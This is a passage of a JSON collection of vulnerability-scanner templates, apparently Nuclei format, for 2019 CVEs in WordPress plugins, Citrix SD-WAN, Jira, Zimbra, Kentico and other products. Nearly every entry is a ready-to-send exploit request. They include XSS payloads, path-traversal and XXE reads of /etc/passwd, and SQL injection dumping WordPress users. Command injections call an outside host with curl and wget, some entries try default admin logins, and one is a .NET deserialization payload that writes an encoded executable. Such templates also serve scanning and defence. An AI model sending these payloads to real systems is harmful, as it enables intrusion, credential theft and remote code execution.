value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - 